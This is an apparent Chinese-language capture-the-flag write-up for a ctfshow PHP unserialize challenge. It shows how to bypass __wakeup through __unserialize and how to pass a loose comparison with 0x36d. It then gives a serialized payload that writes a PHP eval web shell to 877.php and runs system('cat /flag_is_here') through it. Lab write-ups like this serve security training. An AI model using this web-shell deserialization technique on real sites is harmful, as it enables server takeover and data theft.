<?php
highlight_file(__FILE__);
class ctfshowvip{
public $username;
public $password;
public $code;
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function __wakeup(){
if($this->username!='' || $this->password!=''){
die('error');
}
}
public function __invoke(){
eval($this->code);
}
public function __sleep(){
$this->username='';
$this->password='';
}
public function __unserialize($data){
$this->username=$data['username'];
$this->password=$data['password'];
$this->code = $this->username.$this->password;
}
public function __destruct(){
if($this->code==0x36d){
file_put_contents($this->username, $this->password);
}
}
}
unserialize($_GET['vip']);
审计代码发现:
有__unserialize(),在7.4以上版本反序列化会绕过__wakeup()函数。
在destruct()函数中,有file_put_contents可以写入文件,一句话木马
$this->code==0x36d是弱类型比较,0x36d又有没有打引号,所以代表数字,且数字是877,那么877a,877.php等可以通过比较;所以设置username='877.php’来通过比较
exp
<?php
class ctfshowvip{
public $username='877.php';
public $password='<?php eval($_POST[1]);?>';
public $code=0x36d;
payload:
O:10:“ctfshowvip”:3:{s:8:“username”;s:7:“877.php”;s:8:“password”;s:24:"<?php eval($_POST[1]);?>";s:4:“code”;i:877;}
访问url/877.php
post:
1=system(‘cat /flag_is_here’);
拿到flag
|